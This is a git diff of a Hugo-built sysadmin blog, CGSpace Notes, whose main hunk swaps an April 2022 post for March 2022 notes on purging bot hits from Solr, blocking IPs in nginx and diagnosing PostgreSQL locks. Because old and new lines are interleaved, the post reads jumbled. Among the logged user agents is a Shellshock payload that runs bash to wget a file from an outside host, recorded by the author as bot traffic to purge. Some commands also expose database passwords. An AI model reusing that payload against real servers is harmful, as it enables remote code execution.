@ -1042,9 +1042,9 @@ $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisti
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ I looked at the top user agents and IPs in the Solr statistics for last month an
I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&hellip; as that&rsquo;s an actual user&hellip;
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -685,9 +685,9 @@ May 26, 02:57 UTC
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ I simply started it and AReS was running again:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -693,9 +693,9 @@ I simply started it and AReS was running again:
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -30,7 +30,7 @@ Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVO
localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -715,9 +715,9 @@ COPY 20994
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -32,7 +32,7 @@ Update Docker images on AReS server (linode20) and reboot the server:
I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -606,9 +606,9 @@ I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -48,7 +48,7 @@ The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search qu
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -588,9 +588,9 @@ The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search qu
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -46,7 +46,7 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
So we have 1879/7100 (26.46%) matching already
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -791,9 +791,9 @@ Try doing it in two imports. In first import, remove all authors. In second impo
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -32,7 +32,7 @@ First I exported all the 2019 stats from CGSpace:
$ ./run.sh -s http://localhost:8081/solr/statistics -f &#39;time:2019-*&#39; -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -494,9 +494,9 @@ $ zstd statistics-2019.json
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -40,7 +40,7 @@ Purging 455 hits from WhatsApp in statistics
Total number of bot hits purged: 3679
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -577,9 +577,9 @@ Total number of bot hits purged: 3679
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -24,7 +24,7 @@ Start a full harvest on AReS
Start a full harvest on AReS
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -380,9 +380,9 @@ Start a full harvest on AReS
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -38,7 +38,7 @@ We agreed to try to do more alignment of affiliations/funders with ROR
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -724,9 +724,9 @@ isNotNull(value.match(&#39;699&#39;))
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -6,19 +6,35 @@
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta property="og:title" content="April, 2022" />
<meta property="og:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54." />
<meta property="og:title" content="March, 2022" />
<meta property="og:description" content="2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &#39;fuuu&#39; -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-03/" />
<meta property="article:published_time" content="2022-03-01T10:53:39+03:00" />
<meta property="article:modified_time" content="2022-04-24T21:06:28+03:00" />
<meta property="article:published_time" content="2022-03-01T16:46:54+03:00" />
<meta property="article:modified_time" content="2022-04-04T19:15:58+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="April, 2022"/>
<meta name="twitter:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="twitter:title" content="March, 2022"/>
<meta name="twitter:description" content="2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &#39;fuuu&#39; -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
"/>
<meta name="generator" content="Hugo 0.97.3" />
@@ -26,11 +42,11 @@
{
"@context": "http://schema.org",
"@type": "BlogPosting",
"headline": "April, 2022",
"headline": "March, 2022",
"url": "https://alanorth.github.io/cgspace-notes/2022-03/",
"wordCount": "1261",
"datePublished": "2022-03-01T10:53:39+03:00",
"dateModified": "2022-04-24T21:06:28+03:00",
"wordCount": "1836",
"datePublished": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-04-04T19:15:58+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
@@ -43,7 +59,7 @@
<link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-03/">
<title>April, 2022 | CGSpace Notes</title>
<title>March, 2022 | CGSpace Notes</title>
<!-- combined, minified CSS -->
@@ -95,236 +111,352 @@
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">April, 2022</a></h2>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">March, 2022</a></h2>
<p class="blog-post-meta">
<time datetime="2022-03-01T10:53:39+03:00">Tue Mar 01, 2022</time>
<time datetime="2022-03-01T16:46:54+03:00">Tue Mar 01, 2022</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
</p>
</header>
<h2 id="2022-04-01">2022-04-01</h2>
<h2 id="2022-03-01">2022-03-01</h2>
<ul>
<li>I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday
<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</span></span></code></pre></div><h2 id="2022-03-04">2022-03-04</h2>
<ul>
<li>The Discovery indexing took this long:</li>
<li>Looking over the CGSpace Solr statistics from 2022-02
<ul>
<li>I see a few new bots, though once I expanded my search for user agents with &ldquo;www&rdquo; in the name I found so many more!</li>
<li>Here are some of the more prevalent or weird ones:
<ul>
<li>axios/0.21.1</li>
<li>Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)</li>
<li>Nutraspace/Nutch-1.2 (<a href="https://www.nutraspace.com">www.nutraspace.com</a>)</li>
<li>Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; <a href="mailto:webmaster@moreover.com">webmaster@moreover.com</a>)</li>
<li>Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com</li>
<li>Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)</li>
<li>Crowsnest/0.5 (+http://www.crowsnest.tv/)</li>
<li>Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com</li>
<li>metha/0.2.27</li>
<li>ZaloPC-win32-24v454</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x</li>
<li>ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)</li>
<li>FullStoryBot/1.0 (+https://www.fullstory.com)</li>
<li>Link Validity Check From: <a href="http://www.usgs.gov">http://www.usgs.gov</a></li>
<li>OSPScraper (+https://www.opensyllabusproject.org)</li>
<li>() { :;}; /bin/bash -c &quot;wget -O /tmp/bbb <a href="https://www.redel.net.br/1.php?id=3137382e37392e3138372e313832">www.redel.net.br/1.php?id=3137382e37392e3138372e313832</a>&quot;</li>
</ul>
</li>
<li>I submitted <a href="https://github.com/atmire/COUNTER-Robots/pull/52">a pull request to COUNTER-Robots</a> with some of these</li>
</ul>
</li>
<li>I purged a bunch of hits from the stats using the <code>check-spider-hits.sh</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
</span></span><span style="display:flex;"><span>Purging 6 hits from scalaj-http in statistics
</span></span><span style="display:flex;"><span>Purging 5 hits from lua-resty-http in statistics
</span></span><span style="display:flex;"><span>Purging 9 hits from AHC in statistics
</span></span><span style="display:flex;"><span>Purging 7 hits from acebookexternalhit in statistics
</span></span><span style="display:flex;"><span>Purging 1011 hits from axios\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 2216 hits from Faveeo\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 1164 hits from Moreover\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 740 hits from Exploratodo\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 585 hits from GroupHigh\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 438 hits from Crowsnest\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 1326 hits from nbertaupete95 in statistics
</span></span><span style="display:flex;"><span>Purging 182 hits from metha\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 68 hits from ZaloPC-win32-24v454 in statistics
</span></span><span style="display:flex;"><span>Purging 1644 hits from Firefox\/x\.x in statistics
</span></span><span style="display:flex;"><span>Purging 678 hits from ZoteroTranslationServer in statistics
</span></span><span style="display:flex;"><span>Purging 27 hits from FullStoryBot in statistics
</span></span><span style="display:flex;"><span>Purging 26 hits from Link Validity Check in statistics
</span></span><span style="display:flex;"><span>Purging 26 hits from OSPScraper in statistics
</span></span><span style="display:flex;"><span>Purging 1 hits from 3137382e37392e3138372e313832 in statistics
</span></span><span style="display:flex;"><span>Purging 2755 hits from Nutch-[0-9] in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 12914
</span></span></code></pre></div><ul>
<li>I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project</li>
</ul>
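<p>Before purging, it can help to dry-run a candidate user agent against a pattern to confirm it would actually match; a minimal local sketch (the pattern is one from the list above, everything else is illustrative — the real <code>check-spider-hits.sh</code> internals may differ):</p>

```shell
# Dry-run check (illustrative): confirm a user agent matches a purge
# pattern before deleting its hits from Solr with check-spider-hits.sh
ua='axios/0.21.1'
pattern='axios/[0-9]'
if echo "$ua" | grep -qE "$pattern"; then
    echo "would purge hits from: $ua"
fi
```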
<h2 id="2022-03-05">2022-03-05</h2>
<ul>
<li>Start AReS harvest</li>
</ul>
<h2 id="2022-03-10">2022-03-10</h2>
<ul>
<li>A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701–980 in the spreadsheet)
<ul>
<li>I created a filter in LibreOffice and selected the IDs for items with the action &ldquo;delete&rdquo;, then I created a custom text facet in OpenRefine with this GREL:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>real 334m33.625s
</span></span><span style="display:flex;"><span>user 227m51.331s
</span></span><span style="display:flex;"><span>sys 3m43.037s
</span></span></code></pre></div><h2 id="2022-04-04">2022-04-04</h2>
<pre tabindex="0"><code>or(
isNotNull(value.match(&#39;707&#39;)),
isNotNull(value.match(&#39;709&#39;)),
isNotNull(value.match(&#39;710&#39;)),
isNotNull(value.match(&#39;711&#39;)),
isNotNull(value.match(&#39;713&#39;)),
isNotNull(value.match(&#39;717&#39;)),
isNotNull(value.match(&#39;718&#39;)),
...
isNotNull(value.match(&#39;821&#39;))
)
</code></pre><ul>
<li>Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-10-tac-batch4-701to980.map
</span></span></code></pre></div><h2 id="2022-03-12">2022-03-12</h2>
<ul>
<li>Update all containers and rebuild OpenRXV on linode20:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose build
</span></span></code></pre></div><ul>
<li>Then run all system updates and reboot</li>
<li>Start a full harvest on AReS</li>
<li>Help Marianne with submit/approve access on a new collection on CGSpace</li>
<li>Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc)</li>
<li>Looking at the Solr statistics for 2022-03 on CGSpace
</ul>
<h2 id="2022-03-16">2022-03-16</h2>
<ul>
<li>I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent: <code>Apache-HttpClient/4.5.9 (Java/1.8.0_322)</code>, and many others with a normal browser agent, so that&rsquo;s fishy!</li>
<li>The DSpace agent pattern <code>http.?agent</code> seems to have caught the first ones, but I&rsquo;ll purge the IP ones</li>
<li>I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for <code>dns:*msnbot* AND dns:*.msn.com.</code> I see over 100,000, which is a problem I noticed a few months ago too&hellip;</li>
<li>I extracted the MSN Bot IPs from Solr using an IP facet, then used the <code>check-spider-ip-hits.sh</code> script to purge them</li>
<li>Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
<ul>
<li>We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing</li>
</ul>
</li>
</ul>
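<p>The IP facet extraction above boils down to a single Solr query; a hypothetical sketch of building it (the host, port, and core name are assumptions — adjust for your deployment):</p>

```shell
# Build the Solr facet query that lists client IPs whose reverse DNS
# matched MSN/Bing (hypothetical endpoint; the core is typically "statistics")
solr='http://localhost:8081/solr/statistics'
q='dns:*msnbot*'
url="${solr}/select?q=${q}&rows=0&facet=true&facet.field=ip&facet.limit=-1&facet.mincount=1&wt=json"
echo "$url"
# The faceted IPs can then be saved to a file and fed to the purge script:
#   ./ilri/check-spider-ip-hits.sh -f /tmp/msnbot-ips.txt -p
```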
<h2 id="2022-04-10">2022-04-10</h2>
<h2 id="2022-03-20">2022-03-20</h2>
<ul>
<li>Start a full harvest on AReS</li>
</ul>
<h2 id="2022-04-13">2022-04-13</h2>
<h2 id="2022-03-21">2022-03-21</h2>
<ul>
<li>UptimeRobot mailed to say that CGSpace was down
<li>Review a few submissions for Open Repositories 2022</li>
<li>Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed</li>
</ul>
<h2 id="2022-03-22">2022-03-22</h2>
<ul>
<li>I looked and found the load at 44&hellip;</li>
<li>I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
<ul>
<li>I had been meaning to update my local database&hellip;</li>
</ul>
</li>
<li>I re-imported the CGIAR CAS documents to <a href="https://dspacetest.cgiar.org/handle/10568/118432">DSpace Test</a> and generated the PDF thumbnails:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-22-tac-700.map
</span></span><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -i 10568/118432
</span></span></code></pre></div><ul>
<li>On my local environment I decided to run the <code>check-duplicates.py</code> script one more time with all 700 items:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv &gt; /tmp/tac.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span> -o /tmp/2022-03-22-tac-duplicates.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv &gt; /tmp/tac-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv &gt; /tmp/tac-final-duplicates.csv
</span></span></code></pre></div><ul>
<li>I sent the resulting 76 items to Gaia to check</li>
<li>UptimeRobot said that CGSpace was down
<ul>
<li>I looked and found many locks belonging to the REST API application:</li>
</ul>
</li>
<li>There seem to be a lot of locks from the XMLUI:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 3173 dspaceWeb
</span></span><span style="display:flex;"><span> 301 dspaceWeb
</span></span><span style="display:flex;"><span> 2390 dspaceApi
</span></span></code></pre></div><ul>
<li>Looking at the top IPs in nginx&rsquo;s access log one IP in particular stands out:</li>
<li>Looking at nginx&rsquo;s logs, I found the top addresses making requests today:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span> 941 66.249.66.222
</span></span><span style="display:flex;"><span> 1224 95.108.213.28
</span></span><span style="display:flex;"><span> 2074 157.90.209.76
</span></span><span style="display:flex;"><span> 3064 66.249.66.221
</span></span><span style="display:flex;"><span> 95743 185.192.69.15
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /var/log/nginx/rest.log | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span> 1977 45.5.184.2
</span></span><span style="display:flex;"><span> 3167 70.32.90.172
</span></span><span style="display:flex;"><span> 4754 54.195.118.125
</span></span><span style="display:flex;"><span> 5411 205.186.128.185
</span></span><span style="display:flex;"><span> 6826 137.184.159.211
</span></span></code></pre></div><ul>
<li>185.192.69.15 is in the UK</li>
<li>I added a block for that IP in nginx and the load went down&hellip;</li>
<li>137.184.159.211 is on DigitalOcean using this user agent: <code>GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28</code>
<ul>
<li>I blocked this IP in nginx and the load went down immediately</li>
</ul>
<h2 id="2022-04-16">2022-04-16</h2>
</li>
<li>205.186.128.185 is on Media Temple, but it&rsquo;s OK because it&rsquo;s the CCAFS publications importer bot</li>
<li>54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)</li>
<li>70.32.90.172 is on Media Temple and has no user agent</li>
<li>What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
<ul>
<li>Start harvest on AReS</li>
</ul>
<h2 id="2022-04-18">2022-04-18</h2>
<ul>
<li>I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I&rsquo;m on holiday out of the country for Easter)
<ul>
<li>I see there are many locks in use from the XMLUI:</li>
<li>I verified it works as expected with an empty user agent:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c
</span></span><span style="display:flex;"><span> 8932 dspaceWeb
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -H User-Agent:<span style="color:#e6db74">&#39;&#39;</span> <span style="color:#e6db74">&#39;https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all&#39;</span>
</span></span><span style="display:flex;"><span>Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word &#39;bot&#39;, if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
</span></span></code></pre></div><ul>
<li>Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:</li>
<li>I note that the nginx log shows &lsquo;-&rsquo; for a request with an empty user agent, which would be indistinguishable from a request with a &lsquo;-&rsquo;, for example these were successful:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span> 752 69.162.124.231
</span></span><span style="display:flex;"><span> 759 66.249.64.213
</span></span><span style="display:flex;"><span> 864 66.249.66.222
</span></span><span style="display:flex;"><span> 905 2a01:4f8:221:f::2
</span></span><span style="display:flex;"><span> 1013 84.33.2.97
</span></span><span style="display:flex;"><span> 1201 157.55.39.159
</span></span><span style="display:flex;"><span> 1204 157.55.39.144
</span></span><span style="display:flex;"><span> 1209 157.55.39.102
